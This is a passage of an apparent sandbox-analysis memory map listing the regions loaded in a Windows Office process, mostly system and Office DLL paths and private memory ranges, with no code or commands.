0x7fef5250000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 277 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 278 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 279 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 280 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 281 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 282 start_va = 0x7fef68c0000 end_va = 0x7fef6a78fff entry_point = 0x7fef68c0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 283 start_va = 0x7fef6a80000 end_va = 0x7fef6a82fff entry_point = 0x7fef6a80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 284 start_va = 0x7fef6a90000 end_va = 0x7fef6a92fff entry_point = 0x7fef6a90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 285 start_va = 0x7fef6aa0000 end_va = 0x7fef6aa2fff entry_point = 0x7fef6aa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 286 start_va = 0x7fef6ab0000 end_va = 0x7fef6ab2fff entry_point = 0x7fef6ab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 287 start_va = 0x7fef6ac0000 end_va = 0x7fef6ac4fff entry_point = 0x7fef6ac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 288 start_va = 0x7fef6ad0000 end_va = 0x7fef6ad4fff entry_point = 0x7fef6ad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 289 start_va = 0x7fef6ae0000 end_va = 0x7fef6ae2fff entry_point = 0x7fef6ae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 290 start_va = 0x7fef6af0000 end_va = 0x7fef6b8dfff entry_point = 0x7fef6af0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 291 start_va = 0x7fef6b90000 end_va = 0x7fef6b93fff entry_point = 0x7fef6b90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 292 start_va = 0x7fef6ba0000 end_va = 0x7fef6ba3fff entry_point = 0x7fef6ba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 293 start_va = 0x7fef6bb0000 end_va = 0x7fef6bb2fff entry_point = 0x7fef6bb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 294 start_va = 0x7fef6bc0000 end_va = 0x7fef6bc3fff entry_point = 0x7fef6bc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 295 start_va = 0x7fef6d20000 end_va = 0x7fef6d23fff entry_point = 0x7fef6d20000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 296 start_va = 0x7fef6d30000 end_va = 0x7fef6d46fff entry_point = 0x7fef6d30000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 297 start_va = 0x7fef7830000 end_va = 0x7fef78a3fff entry_point = 0x7fef7830000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 298 start_va = 0x7fef78b0000 end_va = 0x7fef7904fff entry_point = 0x7fef78b0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 299 start_va = 0x7fef7910000 end_va = 0x7fef7943fff entry_point = 0x7fef7910000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 300 start_va = 0x7fef8b30000 end_va = 0x7fef8bd6fff entry_point = 0x7fef8b30000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 301 start_va = 0x7fef8be0000 end_va = 0x7fef8cc1fff entry_point = 0x7fef8be0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 302 start_va = 0x7fef8cd0000 end_va = 0x7fef8fe5fff entry_point = 0x7fef8cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 303 start_va = 0x7fefacd0000 end_va = 0x7fefacdafff entry_point = 0x7fefacd0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 304 start_va = 0x7fefad60000 end_va = 0x7fefad74fff entry_point = 0x7fefad60000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 305 start_va = 0x7fefb0d0000 end_va = 0x7fefb0fbfff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 306 start_va = 0x7fefb1b0000 end_va = 0x7fefb1dcfff entry_point = 0x7fefb1b0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 307 start_va = 0x7fefb360000 end_va = 0x7fefb370fff entry_point = 0x7fefb360000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 308 start_va = 0x7fefb390000 end_va = 0x7fefb4b9fff entry_point = 0x7fefb390000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 309 start_va = 0x7fefb4c0000 end_va = 0x7fefb4f4fff entry_point = 0x7fefb4c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 310 start_va = 0x7fefb500000 end_va = 0x7fefb517fff entry_point = 0x7fefb500000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 311 start_va = 0x7fefb710000 end_va = 0x7fefb924fff entry_point = 0x7fefb710000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 312 start_va = 0x7fefb930000 end_va = 0x7fefb985fff entry_point = 0x7fefb930000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 313 start_va = 0x7fefb990000 end_va = 0x7fefbabbfff entry_point = 0x7fefb990000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 314 start_va = 0x7fefbb10000 end_va = 0x7fefbd03fff entry_point = 0x7fefbb10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 315 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 316 start_va = 0x7fefc380000 end_va = 0x7fefc39dfff entry_point = 0x7fefc380000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 317 start_va = 0x7fefc510000 end_va = 0x7fefc55bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 318 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 319 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 320 start_va = 0x7fefca40000 end_va = 0x7fefca61fff entry_point = 0x7fefca40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 321 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 322 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 323 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 324 start_va = 0x7fefcee0000 end_va = 0x7fefcf70fff entry_point = 0x7fefcee0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 325 start_va = 0x7fefcf80000 end_va = 0x7fefcfbcfff entry_point = 0x7fefcf80000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 326 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 327 start_va = 0x7fefcfe0000 end_va = 0x7fefcfeefff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 328 start_va = 0x7fefd080000 end_va = 0x7fefd08efff entry_point = 0x7fefd080000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 329 start_va = 0x7fefd130000 end_va = 0x7fefd169fff entry_point = 0x7fefd130000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 330 start_va = 0x7fefd170000 end_va = 0x7fefd2d6fff entry_point = 0x7fefd170000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 331 start_va = 0x7fefd310000 end_va = 0x7fefd31ffff entry_point = 0x0 region_type = private name = "private_0x000007fefd310000" filename = "" Region: id = 332 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 333 start_va = 0x7fefd390000 end_va = 0x7fefd3a9fff entry_point = 0x7fefd390000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 334 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 335 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 336 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 337 start_va = 0x7fefd570000 end_va = 0x7fefe2f7fff entry_point = 0x7fefd570000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 338 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 339 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 340 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 341 start_va = 0x7fefe630000 end_va = 0x7fefe806fff entry_point = 0x7fefe630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 342 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 343 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 344 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 345 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 346 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 347 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 348 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 349 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 350 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 351 start_va = 0x7feff2a0000 end_va = 0x7feff2f1fff entry_point = 0x7feff2a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 352 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 353 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 354 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 355 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 356 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 357 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 358 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 359 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 360 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 361 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 362 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 363 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 364 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 365 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 366 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 367 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 368 start_va = 0x7fffff90000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 369 start_va = 0x2dc0000 end_va = 0x2dd0fff entry_point = 0x2dc0000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 370 start_va = 0x2e40000 end_va = 0x2e5efff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 371 start_va = 0x8a90000 end_va = 0x8f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 372 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 373 start_va = 0x310000 end_va = 0x318fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 374 start_va = 0x340000 end_va = 0x348fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 375 start_va = 0x2440000 end_va = 0x2463fff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 376 start_va = 0x2800000 end_va = 0x2823fff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 377 start_va = 0x2df0000 end_va = 0x2e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 378 start_va = 0x2e20000 end_va = 0x2e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 379 start_va = 0x2e60000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 380 start_va = 0x2f80000 end_va = 0x2f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 381 start_va = 0x2fa0000 end_va = 0x2fa4fff entry_point = 0x2fa0000 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 382 start_va = 0x2fb0000 end_va = 0x2fb3fff entry_point = 0x2fb0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 383 start_va = 0x6850000 end_va = 0x694ffff entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 384 start_va = 0x6a10000 end_va = 0x6b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 385 start_va = 0x6be0000 end_va = 0x6cdffff entry_point = 0x0 region_type = private name = "private_0x0000000006be0000" filename = "" Region: id = 386 start_va = 0x8f50000 end_va = 0x934ffff entry_point = 0x0 region_type = private name = "private_0x0000000008f50000" filename = "" Region: id = 387 start_va = 0x9350000 end_va = 0x9b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009350000" filename = "" Region: id = 388 start_va = 0x7fef7210000 end_va = 0x7fef7266fff entry_point = 0x7fef7210000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 389 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 390 start_va = 0x2470000 end_va = 0x2471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 391 start_va = 0x9b90000 end_va = 0x9c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009b90000" filename = "" Region: id = 392 start_va = 0x9cd0000 end_va = 0x9dcffff entry_point = 0x0 region_type = private name = "private_0x0000000009cd0000" filename = "" Region: id = 393 start_va = 0x7fef5220000 end_va = 0x7fef523dfff entry_point = 0x7fef5220000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohev.dll") Region: id = 394 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 395 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 396 start_va = 0x72d0000 end_va = 0x73cffff entry_point = 0x0 region_type = private name = "private_0x00000000072d0000" filename = "" Region: id = 397 start_va = 0x9dd0000 end_va = 0xad9ffff entry_point = 0x0 region_type = private name = "private_0x0000000009dd0000" filename = "" Region: id = 398 start_va = 0xaf60000 end_va = 0xb05ffff entry_point = 0x0 region_type = private name = "private_0x000000000af60000" filename = "" Region: id = 399 start_va = 0x7fef6f80000 end_va = 0x7fef7200fff entry_point = 0x7fef6f80000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6917.0607\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6917.0607\\amd64\\filesyncshell64.dll") Region: id = 400 start_va = 0x7fefe3b0000 end_va = 0x7fefe608fff entry_point = 0x7fefe3b0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 401 start_va = 0x7fefea20000 end_va = 0x7fefeb49fff entry_point = 0x7fefea20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 402 start_va = 0x7fefee00000 end_va = 0x7fefef77fff entry_point = 0x7fefee00000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 403 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 404 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 405 start_va = 0x2480000 end_va = 0x2481fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002480000" filename = "" Region: id = 406 start_va = 0x7fef6d50000 end_va = 0x7fef6f63fff 